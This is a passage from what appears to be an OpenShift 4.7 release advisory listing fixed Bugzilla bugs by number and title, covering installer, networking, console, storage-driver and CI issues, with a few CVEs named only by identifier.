to initialize the cluster: Cluster operator image-registry is still updating" 1893963 - [Testday] Workloads-> Virtualization is not loading for Firefox browser 1893972 - Should skip e2e test cases as early as possible 1894013 - [v2v][Testday] VMware to CNV VM import]VMware URL: It is not clear that only the FQDN/IP address is required without 'https://' 1894020 - User with edit users cannot deploy images from their own namespace from the developer perspective 1894025 - OCP 4.5 to 4.6 upgrade for "aws-ebs-csi-driver-operator" fails when "defaultNodeSelector" is set 1894041 - [v2v][[Testday]VM import from VMware/RHV] VM import wizard: The target storage class name is not displayed if default storage class is used. 1894065 - tag new packages to enable TLS support 1894110 - Console shows wrong value for maxUnavailable and maxSurge when set to 0 1894144 - CI runs of baremetal IPI are failing due to newer libvirt libraries 1894146 - ironic-api used by metal3 is over provisioned and consumes a lot of RAM 1894194 - KuryrPorts leftovers from 4.6 GA need to be deleted 1894210 - Failed to encrypt OSDs on OCS4.6 installation (via UI) 1894216 - Improve OpenShift Web Console availability 1894275 - Fix CRO owners file to reflect node owner 1894278 - "database is locked" error when adding bundle to index image 1894330 - upgrade channels needs to be updated for 4.7 1894342 - oauth-apiserver logs many "[SHOULD NOT HAPPEN] failed to update managedFields for ... OAuthClient ... no corresponding type for oauth.openshift.io/v1, Kind=OAuthClient" 1894374 - Dont prevent the user from uploading a file with incorrect extension 1894432 - [oVirt] sometimes installer timeout on tmp_import_vm 1894477 - bash syntax error in nodeip-configuration.service 1894503 - add automated test for Polarion CNV-5045 1894519 - [OSP] External mode cluster creation disabled for Openstack and oVirt platform 1894539 - [on-prem] Unable to deploy additional machinesets on separate subnets 1894645 - Cinder volume provisioning crashes on nil cloud provider 1894677 - image-pruner job is panicking: klog stack 1894810 - Remove TechPreview Badge from Eventing in Serverless version 1.11.0 1894860 - 'backend' CI job passing despite failing tests 1894910 - Update the node to use the real-time kernel fails 1894992 - All nightly jobs for e2e-metal-ipi failing due to ipa image missing tenacity package 1895065 - Schema / Samples / Snippets Tabs are all selected at the same time 1895099 - vsphere-upi and vsphere-upi-serial jobs time out waiting for bootstrap to complete in CI 1895141 - panic in service-ca injector 1895147 - Remove memory limits on openshift-dns 1895169 - VM Template does not properly manage Mount Windows guest tools check box during VM creation 1895268 - The bundleAPIs should NOT be empty 1895309 - [OCP v47] The RHEL node scaleup fails due to "No package matching 'cri-o-1.19.*' found available" on OCP 4.7 cluster 1895329 - The infra index filled with warnings "WARNING: kubernetes.io/cinder built-in volume provider is now deprecated. The Cinder volume provider is deprecated and will be removed in a future release" 1895360 - Machine Config Daemon removes a file although its defined in the dropin 1895367 - Missing image in metadata DB index.db in disconnected Operator Hub installation. OCP 4.6.1 1895372 - Web console going blank after selecting any operator to install from OperatorHub 1895385 - Revert KUBELET_LOG_LEVEL back to level 3 1895423 - unable to edit an application with a custom builder image 1895430 - unable to edit custom template application 1895509 - Backup taken on one master cannot be restored on other masters 1895537 - [sig-imageregistry][Feature:ImageExtract] Image extract should extract content from an image 1895838 - oc explain description contains '/' 1895908 - "virtio" option is not available when modifying a CD-ROM to disk type 1895909 - e2e-metal-ipi-ovn-dualstack is failing 1895919 - NTO fails to load kernel modules 1895959 - configuring webhook token authentication should prevent cluster upgrades 1895979 - Unable to get coreos-installer with --copy-network to work 1896101 - [cnv][automation] Added negative tests for migration from VMWare and RHV 1896160 - CI: Some cluster operators are not ready: marketplace (missing: Degraded) 1896188 - [sig-cli] oc debug deployment configs from a build: local-busybox-1-build not completed 1896218 - Occasional GCP install failures: Error setting IAM policy for project ...: googleapi: Error 400: Service account ... does not exist., badRequest 1896229 - Current Rate of Bytes Received and Current Rate of Bytes Transmitted data can not be loaded 1896244 - Found a panic in storage e2e test 1896296 - Git links should avoid .git as part of the URL and should not link git:// urls in general 1896302 - [e2e][automation] Fix 4.6 test failures 1896365 - [Migration]The SDN migration cannot revert under some conditions 1896384 - [ovirt IPI]: local coredns resolution not working 1896446 - Git clone from private repository fails after upgrade OCP 4.5 to 4.6 1896529 - Incorrect instructions in the Serverless operator and application quick starts 1896645 - documentationBaseURL needs to be updated for 4.7 1896697 - [Descheduler] policy.yaml param in cluster configmap is empty 1896704 - Machine API components should honour cluster wide proxy settings 1896732 - "Attach to Virtual Machine OS" button should not be visible on old clusters 1896866 - File /etc/NetworkManager/system-connections/default_connection.nmconnection is incompatible with SR-IOV operator 1896898 - ovs-configuration.service fails when multiple IPv6 default routes are provided via RAs over the same interface and deployment bootstrap fails 1896918 - start creating new-style Secrets for AWS 1896923 - DNS pod /metrics exposed on anonymous http port 1896977 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters 1897003 - VNC console cannot be connected after visit it in new window 1897008 - Cypress: reenable check for 'aria-hidden-focus' rule & checkA11y test for modals 1897026 - [Migration] With updating optional network operator configuration, migration stucks on MCO 1897039 - router pod keeps printing log: template "msg"="router reloaded" "output"="[WARNING] 316/065823 (15) : parsing [/var/lib/haproxy/conf/haproxy.config:52]: option 'http-use-htx' is deprecated and ignored 1897050 - [IBM Power] LocalVolumeSet provisions boot partition as PV. 1897073 - [OCP 4.5] wrong netid assigned to Openshift projects/namespaces 1897138 - oVirt provider uses depricated cluster-api project 1897142 - When scaling replicas to zero, Octavia loadbalancer pool members are not updated accordingly 1897252 - Firing alerts are not showing up in console UI after cluster is up for some time 1897354 - Operator installation showing success, but Provided APIs are missing 1897361 - The MCO GCP-OP tests fail consistently on containerruntime tests with "connection refused" 1897412 - [sriov]disableDrain did not be updated in CRD of manifest 1897423 - Max unavailable and Max surge value are not shown on Deployment Config Details page 1897516 - Baremetal IPI deployment with IPv6 control plane fails when the nodes obtain both SLAAC and DHCPv6 addresses as they set their hostname to 'localhost' 1897520 - After restarting nodes the image-registry co is in degraded true state. 1897584 - Add casc plugins 1897603 - Cinder volume attachment detection failure in Kubelet 1897604 - Machine API deployment fails: Kube-Controller-Manager can't reach API: "Unauthorized" 1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1897641 - Baremetal IPI with IPv6 control plane: nodes respond with duplicate packets to ICMP6 echo requests 1897676 - [CI] [Azure] [UPI] CI failing since 4.6 changes in ignition 1897830 - [GSS] Unable to deploy OCS 4.5.2 on OCP 4.6.1, cannotCreate OCS Cluster Service1897891 - [RFE][v2v][UI][CNV VM import] Providing error message or/and block migration when vddk-init-image is missing 1897897 - ptp lose sync openshift 4.6 1898036 - no network after reboot (IPI) 1898045 - AWS EBS CSI Driver can not get updated cloud credential secret automatically 1898097 - mDNS floods the baremetal network 1898118 - Lack of logs on some image stream tests make hard to find root cause of a problem 1898134 - Descheduler logs show absolute values instead of percentage when LowNodeUtilization strategy is applied 1898159 - kcm operator shall pass --allocate-node-cidrs=false to kcm for ovn-kube and openshift-sdn cluster 1898174 - [OVN] EgressIP does not guard against node IP assignment 1898194 - GCP: can't install on custom machine types 1898238 - Installer validations allow same floating IP for API and Ingress 1898268 - [OVN]:make checkbroken on 4.6 1898289 - E2E test: Use KUBEADM_PASSWORD_FILE by default 1898320 - Incorrect Apostrophe Translation of "it's" in Scheduling Disabled Popover 1898357 - Within the operatorhub details view, long unbroken text strings do not wrap cause breaking display. 1898407 - [Deployment timing regression] Deployment takes longer with 4.7 1898417 - GCP: the dns targets in Google Cloud DNS is not updated after recreating loadbalancer service 1898487 - [oVirt] Node is not removed when VM has been removed from oVirt engine 1898500 - Failure to upgrade operator when a Service is included in a Bundle 1898517 - Ironic auto-discovery may result in rogue nodes registered in ironic 1898532 - Display names defined in specDescriptors not respected 1898580 - When adding more than one node selector to the sriovnetworknodepolicy, the cni and the device plugin pods are constantly rebooted 1898613 - Whereabouts should exclude IPv6 ranges 1898655 - [oVirt] Node deleted in oVirt should cause the Machine to go into a Failed phase 1898679 - Operand creation form - Required "type: object" properties (Accordion component) are missing red asterisk 1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability 1898745 - installation failing with CVO reporting openshift-samples not rolled out, samples not setting versions in its ClusterOperator 1898839 - Wrong YAML in operator metadata 1898851 - Multiple Pods access the same volume on the same node e2e test cases are missed from aws ebs csi driver e2e test job 1898873 - Remove TechPreview Badge from Monitoring 1898954 - Backup script does not take /etc/kubernetes/static-pod-resources on a reliable way 1899111 - [RFE] Update jenkins-maven-agen to maven36 1899128 - VMI details screen -> show the warning that it is preferable to have a VM only if the VM actually does not exist 1899175 - bump the RHCOS boot images for 4.7 1899198 - Use new packages for ipa ramdisks 1899200 - In Installed Operators page I cannot search for an Operator by it's name 1899220 - Support AWS IMDSv2 1899350 - configure-ovs.sh doesn't configure bonding options 1899433 - When Creating OCS from ocs wizard Step Discover Disks shows Error "An error occurred Not Found" 1899459 - Failed to start monitoring pods once the operator removed from override list of CVO 1899515 - Passthrough credentials are not immediately re-distributed on update 1899575 - update discovery burst to reflect lots of CRDs on openshift clusters 1899582 - update discovery burst to reflect lots of CRDs on openshift clusters 1899588 - Operator objects are re-created after all other associated resources have been deleted 1899600 - Increased etcd fsync latency as of OCP 4.6 1899603 - workers-rhel7 CI jobs failing: Failed to remove rollback: error running rpm-ostree cleanup 1899627 - Project dashboard Active status using small icon 1899725 - Pods table does not wrap well with quick start sidebar open 1899746 - [ovn] error while waiting on flows for pod: OVS sandbox port is no longer active (probably due to a subsequent CNI ADD) 1899760 - etcd_request_duration_seconds_bucket metric has excessive cardinality 1899835 - catalog-operator repeatedly crashes with "runtime error: index out of range [0] with length 0" 1899839 - thanosRuler.resources.requests does not take effect in user-workload-monitoring-config confimap 1899853 - additionalSecurityGroupIDs not working for master nodes 1899922 - NP changes sometimes influence new pods. 1899949 - [Platform] Remove restriction on disk type selection for LocalVolumeSet 1900008 - Fix internationalized sentence fragments in ImageSearch.tsx 1900010 - Fix internationalized sentence fragments in BuildImageSelector.tsx 1900020 - Remove ' from internationalized keys 1900022 - Search Page - Top labels field is not applied to selected Pipeline resources 1900030 - disruption_tests: [sig-imageregistry] Image registry remain available failing consistently 1900126 - Creating a VM results in suggestion to create a default storage class when one already exists 1900138 - [OCP on RHV] Remove insecure mode from the installer 1900196 - stalld is not restarted after crash 1900239 - Skip "subPath should be able to unmount" NFS test 1900322 - metal3 pod's toleration for key: node-role.kubernetes.io/master currently matches on exact value matches but should match on Exists 1900377 - [e2e][automation] create new css selector for active users 1900496 - (release-4.7) Collect spec config for clusteroperator resources 1900672 - (s390x) Upgrade from old LUKS to new not working with DASD disks 1900699 - Impossible to add new Node on OCP 4.6 using large ECKD disks - fdasd issue 1900759 - include qemu-guest-agent by default 1900790 - Track all resource counts via telemetry 1900835 - Multus errors when cachefile is not found 1900935 -oc adm release mirrorpanic panic: runtime error 1900989 - accessing the route cannot wake up the idled resources 1901040 - When scaling down the status of the node is stuck on deleting 1901057 - authentication operator health check failed when installing a cluster behind proxy 1901107 - pod donut shows incorrect information 1901111 - Installer dependencies are broken 1901200 - linuxptp-daemon crash when enable debug log level 1901301 - CBO should handle platform=BM without provisioning CR 1901355 - [Azure][4.7] Invalid vm size from customized compute nodes does not fail properly 1901363 - High Podready Latency due to timed out waiting for annotations 1901373 - redundant bracket on snapshot restore button 1901376 - [on-prem] Upgrade from 4.6 to 4.7 failed with "timed out waiting for the condition during waitForControllerConfigToBeCompleted: controllerconfig is not completed: ControllerConfig has not completed: completed(false) running(false) failing(true" 1901395 - "Edit virtual machine template" action link should be removed 1901472 - [OSP] Bootstrap and master nodes use different keepalived unicast setting 1901517 - RHCOS 4.6.1 uses a single NetworkManager connection for multiple NICs when using default DHCP 1901531 - Console returns a blank page while trying to create an operator Custom CR with Invalid Schema 1901594 - Kubernetes resource CRUD operations.Kubernetes resource CRUD operations Pod "before all" hook for "creates the resource instance" 1901604 - CNO blocks editing Kuryr options 1901675 - [sig-network] multicast when using one of the plugins 'redhat/openshift-ovs-multitenant, redhat/openshift-ovs-networkpolicy' should allow multicast traffic in namespaces where it is enabled 1901909 - The device plugin pods / cni pod are restarted every 5 minutes 1901982 - [sig-builds][Feature:Builds] build can reference a cluster service with a build being created from new-build should be able to run a build that references a cluster service 1902019 - when podTopologySpreadConstraint strategy is enabled for descheduler it throws error 1902059 - Wire a real signer for service accout issuer 1902091 -cluster-image-registry-operatorpod leaves connections open when fails connecting S3 storage 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 1902157 - The DaemonSet machine-api-termination-handler couldn't allocate Pod 1902253 - MHC status doesnt set RemediationsAllowed = 0 1902299 - Failed to mirror operator catalog - error: destination registry required 1902545 - Cinder csi driver node pod should add nodeSelector for Linux 1902546 - Cinder csi driver node pod doesn't run on master node 1902547 - Cinder csi driver controller pod doesn't run on master node 1902552 - Cinder csi driver does not use the downstream images 1902595 - Project workloads list view doesn't show alert icon and hover message 1902600 - Container csi-snapshotter in Cinder csi driver needs to use ImagePullPolicy=IfNotPresent 1902601 - Cinder csi driver pods run as BestEffort qosClass 1902653 - [BM][IPI] Master deployment failed: No valid host was found. Reason: No conductor service registered which supports driver redfish for conductor group 1902702 - [sig-auth][Feature:LDAP][Serial] ldap group sync can sync groups from ldap: oc cp over non-existing directory/file fails 1902746 - [BM][IP] Master deployment failed - Base.1.0.GeneralError: database is locked 1902824 - failed to generate semver informed package manifest: unable to determine default channel 1902894 - hybrid-overlay-node crashing trying to get node object during initialization 1902969 - Cannot load vmi detail page 1902981 - It should default to current namespace when create vm from template 1902996 - [AWS] UPI on USGov, bootstrap machine can not fetch ignition file via s3:// URI 1903033 - duplicated lines of imageContentSources is seen when mirror release image to local registry 1903034 - OLM continuously printing debug logs 1903062 - [Cinder csi driver] Deployment mounted volume have no write access 1903078 - Deleting VolumeSnapshotClass makes VolumeSnapshot not Ready 1903107 - Enable vsphere-problem-detector e2e tests 1903164 - OpenShift YAML editor jumps to top every few seconds 1903165 - Improve Canary Status Condition handling for e2e tests 1903172 - Column Management: Fix sticky footer on scroll 1903186 - [Descheduler] cluster logs should report some info when PodTopologySpreadConstraints strategy is enabled 1903188 - [Descheduler] cluster log reports failed to validate server configuration" err="unsupported log format: 1903192 - Role name missing on create role binding form 1903196 - Popover positioning is misaligned for Overview Dashboard status items 1903206 - Ingress controller incorrectly routes traffic to non-ready pods/backends. 1903226 - MutatingWebhookConfiguration pod-identity-webhook does not exclude critical control-plane components 1903248 - Backport Upstream Static Pod UID patch 1903277 - Deprovisioning Not Deleting Security Groups [VpcLimitExceeded on e2e-aws tests] 1903290 - Kubelet repeatedly log the same log line from exited containers 1903346 - PV backed by FC lun is not being unmounted properly and this leads to IO errors / xfs corruption. 1903382 - Panic when task-graph is canceled with a TaskNode with no tasks 1903400 - Migrate a VM which is not running goes to pending state 1903402 - Nic/Disk on VMI overview should link to VMI's nic/disk page 1903414 - NodePort is not working when configuring an egress IP address 1903424 - mapi_machine_phase_transition_seconds_sum doesn't work 1903464 - "Evaluating rule failed" for "record: cluster:kube_persistentvolumeclaim_resource_requests_storage_bytes:provisioner:sum" and "record: cluster:kubelet_volume_stats_used_bytes:provisioner:sum" 1903639 - Hostsubnet gatherer produces wrong output 1903651 - Network Policies are not working as expected with OVN-Kubernetes when traffic hairpins back to the same source through a service 1903660 - Cannot install with Assisted Installer on top of IPv6 since network provider is not started 1903674 - [sig-apps] ReplicationController should serve a basic image on each replica with a private image 1903717 - Handle different Pod selectors for metal3 Deployment 1903733 - Scale up followed by scale down can delete all running workers 1903917 - Failed to load "Developer Catalog" page 1903999 - Httplog response code is always zero 1904026 - The quota controllers should resync on new resources and make progress 1904064 - Automated cleaning is disabled by default 1904124 - DHCP to static lease script doesn't work correctly if starting with infinite leases 1904125 - Boostrap VM .ign image gets added into 'default' pool instead of <cluster-name>-<id>-bootstrap 1904131 - kuryr tempest plugin test test_ipblock_network_policy_sg_rules fails 1904133 - KubeletConfig flooded with failure conditions 1904161 - AlertmanagerReceiversNotConfigured fires unconditionally on alertmanager restart 1904243 - RHCOS 4.6.1 missing ISCSI initiatorname.iscsi ! 1904244 - MissingKey errors for two plugins using i18next.t 1904262 - clusterresourceoverride-operator has version: 1.0.0 every build 1904296 - VPA-operator has version: 1.0.0 every build 1904297 - The index image generated by "opm index prune" leaves unrelated images 1904305 - Should have scroll-down bar for the field which the values list has too many results under dashboards 1904385 - [oVirt] registry cannot mount volume on 4.6.4 -> 4.6.6 upgrade 1904497 - vsphere-problem-detector: Run on vSphere cloud only 1904501 - [Descheduler] descheduler does not evict any pod when PodTopologySpreadConstraint strategy is set 1904502 - vsphere-problem-detector: allow longer timeouts for some operations 1904503 - vsphere-problem-detector: emit alerts 1904538 - [sig-arch][Early] Managed cluster should start all core operators: monitoring: container has runAsNonRoot and image has non-numeric user (nobody) 1904578 - metric scraping for vsphere problem detector is not configured 1904582 - All application traffic broken due to unexpected load balancer change on 4.6.4 -> 4.6.6 upgrade 1904663 - IPI pointer customization MachineConfig always generated 1904679 - [Feature:ImageInfo] Image info should display information about images 1904683 -[sig-builds][Feature:Builds] s2i build with a root user imagetests use docker.io image 1904684 - [sig-cli] oc debug ensure it works with image streams 1904713 - Helm charts with kubeVersion restriction are filtered incorrectly 1904776 - Snapshot modal alert is not pluralized 1904824 - Set vSphere hostname from guestinfo before NM starts 1904941 - Insights status is always showing a loading icon 1904973 - KeyError: 'nodeName' on NP deletion 1904985 - Prometheus and thanos sidecar targets are down 1904993 - Many ampersand special characters are found in strings 1905066 - QE - Monitoring test cases - smoke test suite automation 1905074 - QE -Gherkin linter to maintain standards 1905100 - Too many haproxy processes in default-router pod causing high load average 1905104 - Snapshot modal disk items missing keys 1905115 - CI: dev-scripts fail on 02_configure_host: Failed to start network ostestbm 1905119 - Race in AWS EBS determining whether custom CA bundle is used 1905128 - [e2e][automation] e2e tests succeed without actually execute 1905133 - operator conditions special-resource-operator 1905141 - vsphere-problem-detector: report metrics through telemetry 1905146 - Backend Tests: TestHelmRepoGetter_SkipDisabled failures 1905194 - Detecting broken connections to the Kube API takes up to 15 minutes 1905221 - CVO transitions from "Initializing" to "Updating" despite not attempting many manifests 1905232 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them failing due to inconsistent images between CI and OCP 1905253 - Inaccurate text at bottom of Events page 1905298 - openshift-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory 1905299 - OLM fails to update operator 1905307 - Provisioning CR is missing from must-gather 1905319 - cluster-samples-operator containers are not requesting required memory resource 1905320 - csi-snapshot-webhook is not requesting required memory resource 1905323 - dns-operator is not requesting required memory resource 1905324 - ingress-operator is not requesting required memory resource 1905327 - openshift-kube-scheduler initContainer wait-for-host-port is not requesting required resources: cpu, memory 1905328 - Changing the bound token service account issuer invalids previously issued bound tokens 1905329 - openshift-oauth-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory 1905330 - openshift-monitoring init-textfile is not requesting required resources: cpu, memory 1905338 - QE -Cypress Automation for Add Flow - Database, Yaml, OperatorBacked, PageDetails 1905347 - QE - Design Gherkin Scenarios 1905348 - QE - Design Gherkin Scenarios 1905362 - [sriov] Error message 'Fail to update DaemonSet' always shown in sriov operator pod 1905368 - [sriov] net-attach-def generated from sriovnetwork cannot be restored once it was deleted 1905370 - A-Z/Z-A sorting dropdown on Developer Catalog page is not aligned with filter text input 1905380 - Default to Red Hat/KubeVirt provider if common template does not have provider annotation 1905393 - CMO uses rbac.authorization.k8s.io/v1beta1 instead of rbac.authorization.k8s.io/v1 1905404 - The example of "Remove the entrypoint on the mysql:latest image" foroc image appenddoes not work 1905416 - Hyperlink not working from Operator Description 1905430 - usbguard extension fails to install because of missing correct protobuf dependency version 1905492 - The stalld service has a higher scheduler priority than ksoftirq and rcu{b, c} threads 1905502 - Test flake - unable to get https transport for ephemeral-registry 1905542 - [GSS] The "External" mode option is not available when the OCP cluster is deployed using Redhat Cluster Assisted Installer 4.6. 1905599 - Errant change to lastupdatetime in copied CSV status can trigger runaway csv syncs 1905610 - Fix typo in export script 1905621 - Protractor login test fails against a 4.7 (nightly) Power cluster 1905640 - Subscription manual approval test is flaky 1905647 - Report physical core valid-for-subscription min/max/cumulative use to telemetry 1905696 - ClusterMoreUpdatesModal component did not get internationalized 1905748 - with sharded ingresscontrollers, all shards reload when any endpoint changes 1905761 - NetworkPolicy with Egress policyType is resulting in SDN errors and improper communication within Project 1905778 - inconsistent ingresscontroller between fresh installed cluster and upgraded cluster 1905792 - [OVN]Cannot create egressfirewalll with dnsName 1905889 - Should create SA for each namespace that the operator scoped 1905920 - Quickstart exit and restart 1905941 - Page goes to error after create catalogsource 1905977 - QE ghaekin design scenaio-pipeline metrics ODC-3711 1906032 - Canary Controller: Canary daemonset rolls out slowly in large clusters 1906100 - Disconnected cluster upgrades are failing from the cli, when signature retrieval is being blackholed instead of quickly rejected 1906105 - CBO annotates an existing Metal3 deployment resource to indicate that it is managing it 1906118 - OCS feature detection constantly polls storageclusters and storageclasses 1906120 - 'Create Role Binding' form not setting user or group value when created from a user or group resource 1906121 - [oc] After new-project creation, the kubeconfig file does not set the project 1906134 - OLM should not create OperatorConditions for copied CSVs 1906143 - CBO supports log levels 1906186 - i18n: Translators are not able to translatethiswithout context for alert manager config 1906228 - tuned and openshift-tuned sometimes do not terminate gracefully, slowing reboots 1906274 - StorageClass installed by Cinder csi driver operator should enable the allowVolumeExpansion to support volume resize. 1906276 -oc image appendcan't work with multi-arch image with --filter-by-os='.*' 1906318 - use proper term for Authorized SSH Keys 1906335 - The lastTransitionTime, message, reason field of operatorcondition should be optional 1906356 - Unify Clone PVC boot source flow with URL/Container boot source 1906397 - IPA has incorrect kernel command line arguments 1906441 - HorizontalNav and NavBar have invalid keys 1906448 - Deploy using virtualmedia with provisioning network disabled fails - 'Failed to connect to the agent' in ironic-conductor log 1906459 - openstack: Quota Validation fails if unlimited quotas are given to a project 1906496 - [BUG] Thanos having possible memory leak consuming huge amounts of node's memory and killing them 1906508 - TestHeaderNameCaseAdjust outputs nil error message on some failures 1906511 - Root reprovisioning tests flaking often in CI 1906517 - Validation is not robust enough and may prevent to generate install-confing. 1906518 - Update snapshot API CRDs to v1 1906519 - Update LSO CRDs to use v1 1906570 - Number of disruptions caused by reboots on a cluster cannot be measured 1906588 - [ci][sig-builds] nodes is forbidden: User "e2e-test-jenkins-pipeline-xfghs-user" cannot list resource "nodes" in API group "" at the cluster scope 1906650 - Cannot collect network policy, EgressFirewall, egressip logs with gather_network_logs 1906655 - [SDN]Cannot colloect ovsdb-server.log and ovs-vswitchd.log with gather_network_logs 1906679 - quick start panel styles are not loaded 1906683 - Kn resources are not showing in Topology if triggers has KSVC and IMC as subscriber 1906684 - Event Source creation fails if user selects no app group and switch to yaml and then to form 1906685 - SinkBinding is shown in topology view if underlying resource along with actual source created 1906689 - user can pin to nav configmaps and secrets multiple times 1906691 - Add doc which describes disabling helm chart repository 1906713 - Quick starts not accesible for a developer user 1906718 - helm chart "provided by Redhat" is misspelled 1906732 - Machine API proxy support should be tested 1906745 - Update Helm endpoints to use Helm 3.4.x 1906760 - performance issues with topology constantly re-rendering 1906766 - localizedAutoscaled&Autoscalingpod texts overlap with the pod ring 1906768 - Virtualization nav item is incorrectly placed in the Admin Workloads section 1906769 - topology fails to load with non-kubeadmin user 1906770 - shortcuts on mobiles view occupies a lot of space 1906798 - Dev catalog customization doesn't update console-config ConfigMap 1906806 - Allow installing extra packages in ironic container images 1906808 - [test-disabled] ServiceAccounts should support OIDC discovery of service account issuer 1906835 - Topology view shows add page before then showing full project workloads 1906840 - ClusterOperator should not have status "Updating" if operator version is the same as the release version 1906844 - EndpointSlice and EndpointSliceProxying feature gates should be disabled for openshift-sdn kube-proxy 1906860 - Bump kube dependencies to v1.20 for Net Edge components 1906864 - Quick Starts Tour: Need to adjust vertical spacing 1906866 - Translations of Sample-Utils 1906871 - White screen when sort by name in monitoring alerts page 1906872 - Pipeline Tech Preview Badge Alignment 1906875 - Provide an option to force backup even when API is not available. 1906877 - Placeholder' value in search filter do not match column heading in Vulnerabilities 1906879 - Add missing i18n keys 1906880 - oidcdiscoveryendpoint controller invalidates all TokenRequest API tokens during install 1906896 - No Alerts causes odd empty Table (Need no content message) 1906898 - Missing User RoleBindings in the Project Access Web UI 1906899 - Quick Start - Highlight Bounding Box Issue 1906916 - Teach CVO about flowcontrol.apiserver.k8s.io/v1beta1 1906933 - Cluster Autoscaler should have improved mechanisms for group identifiers 1906935 - Delete resources when Provisioning CR is deleted 1906968 - Must-gather should support collecting kubernetes-nmstate resources 1906986 - Ensure failed pod adds are retried even if the pod object doesn't change 1907199 - Need to upgrade machine-api-operator module version under cluster-api-provider-kubevirt 1907202 - configs.imageregistry.operator.openshift.io cluster does not update its status fields after URL change 1907211 - beta promotion of p&f switched storage version to v1beta1, making downgrades impossible. 1907269 - Tooltips data are different when checking stack or not checking stack for the same time 1907280 - Install tour of OCS not available. 1907282 - Topology page breaks with white screen 1907286 - The default mhc machine-api-termination-handler couldn't watch spot instance 1907287 - [csi-snapshot-webhook] should support both v1beta1 and v1 version when creating volumesnapshot/volumesnapshotcontent 1907293 - Increase timeouts in e2e tests 1907295 - Gherkin script for improve management for helm 1907299 - Advanced Subscription Badge for KMS and Arbiter not present 1907303 - Align VM template list items by baseline 1907304 - Use PF styles for selected template card in VM Wizard 1907305 - Drop 'ISO' from CDROM boot source message 1907307 - Support and provider labels should be passed on between templates and sources 1907310 - Pin action should be renamed to favorite 1907312 - VM Template source popover is missing info about added date 1907313 - ClusterOperator objects cannot be overriden with cvo-overrides 1907328 - iproute-tc package is missing in ovn-kube image 1907329 - CLUSTER_PROFILE env. variable is not used by the CVO 1907333 - Node stuck in degraded state, mcp reports "Failed to remove rollback: error running rpm-ostree cleanup -r: error: Timeout was reached" 1907373 - Rebase to kube 1.20.0 1907375 - Bump to latest available 1.20.x k8s - workloads team 1907378 - Gather netnamespaces networking info 1907380 - kube-rbac-proxy exposes tokens, has excessive verbosity 1907381 - OLM fails to deploy an operator if its deployment template contains a description annotation that doesn't match the CSV one 1907390 - prometheus-adapter: panic after k8s 1.20 bump 1907399 - build log icon link on topology nodes cause app to reload 1907407 - Buildah version not accessible 1907421 - [4.6.1]oc-image-mirror command failed on "error: unable to copy layer" 1907453 - Dev Perspective -> running vm details -> resources -> no data 1907454 - Install PodConnectivityCheck CRD with CNO 1907459 - "The Boot source is also maintained by Red Hat." is always shown for all boot sources 1907475 - Unable to estimate the error rate of ingress across the connected fleet 1907480 -Active alertssection throwing forbidden error for users. 1907518 - Kamelets/Eventsource should be shown to user if they have create access 1907543 - Korean timestamps are shown when users' language preferences are set to German-en-en-US 1907610 - Update kubernetes deps to 1.20 1907612 - Update kubernetes deps to 1.20 1907621 - openshift/installer: bump cluster-api-provider-kubevirt version 1907628 - Installer does not set primary subnet consistently 1907632 - Operator Registry should update its kubernetes dependencies to 1.20 1907639 - pass dual-stack node IPs to kubelet in dual-stack clusters 1907644 - fix up handling of non-critical annotations on daemonsets/deployments 1907660 - Pod list does not render cell height correctly when pod names are too long (dynamic table rerendering issue?) 1907670 - CVE-2020-27846 crewjam/saml: authentication bypass in saml authentication 1907671 - Ingress VIP assigned to two infra nodes simultaneously - keepalived process running in pods seems to fail 1907767 - [e2e][automation]update test suite for kubevirt plugin 1907770 - Recent RHCOS 47.83 builds (from rhcos-47.83.202012072210-0 on) don't allow master and worker nodes to boot 1907792 - Theoverridesof the OperatorCondition cannot block the operator upgrade 1907793 - Surface support info in VM template details 1907812 - 4.7 to 4.6 downgrade stuck in clusteroperator storage 1907822 - [OCP on OSP] openshift-install panic when checking quota with install-config have no flavor set 1907863 - Quickstarts status not updating when starting the tour 1907872 - dual stack with an ipv6 network fails on bootstrap phase 1907874 - QE - Design Gherkin Scenarios for epic ODC-5057 1907875 - No response when try to expand pvc with an invalid size 1907876 - Refactoring record package to make gatherer configurable 1907877 - QE - Automation- pipelines builder scripts 1907883 - Fix Pipleine creation without namespace issue 1907888 - Fix pipeline list page loader 1907890 - Misleading and incomplete alert message shown in pipeline-parameters and pipeline-resources form 1907892 - Unable to edit application deployed using "From Devfile" option 1907893 - navSortUtils.spec.ts unit test failure 1907896 - When a workload is added, Topology does not place the new items well 1907908 - VM Wizard always uses VirtIO for the VM rootdisk regardless what is defined in common-template 1907924 - Enable madvdontneed in OpenShift Images 1907929 - Enable madvdontneed in OpenShift System Components Part 2 1907936 - NTO is not reporting nto_profile_set_total metrics correctly after reboot 1907947 - The kubeconfig saved in tenantcluster shouldn't include anything that is not related to the current context 1907948 - OCM-O bump to k8s 1.20 1907952 - bump to k8s 1.20 1907972 - Update OCM link to open Insights tab 1907989 - DataVolumes was intorduced in common templates - VM creation fails in the UI 1907998 - Gather kube_pod_resource_request/limit metrics as exposed in upstream KEP 1916 1908001 - [CVE-2020-10749] Update github.com/containernetworking/plugins to v.0.8.6 in egress-router-cni 1908014 - e2e-aws-ansible and e2e-aws-helm are broken in ocp-release-operator-sdk 1908035 - dynamic-demo-plugin build does not generate dist directory 1908135 - quick search modal is not centered over topology 1908145 - kube-scheduler-recovery-controller container crash loop when router pod is co-scheduled 1908159 - [AWS C2S] MCO fails to sync cloud config 1908171 - GCP: Installation fails when installing cluster with n1-custom-4-16384custom type (n1-custom-4-16384) 1908180 - Add source for template is stucking in preparing pvc 1908217 - CI: Server-Side Apply should work for oauth.openshift.io/v1: has no tokens 1908231 - [Migration] The pods ovnkube-node are in CrashLoopBackOff after SDN to OVN 1908277 - QE - Automation- pipelines actions scripts 1908280 - Documentation describingignore-volume-azis incorrect 1908296 - Fix pipeline builder form yaml switcher validation issue 1908303 - [CVE-2020-28367 CVE-2020-28366] Remove CGO flag from rhel Dockerfile in Egress-Router-CNI 1908323 - Create button missing for PLR in the search page 1908342 - The new pv_collector_total_pv_count is not reported via telemetry 1908344 - [vsphere-problem-detector] CheckNodeProviderID and CheckNodeDiskUUID have the same name 1908347 - CVO overwrites 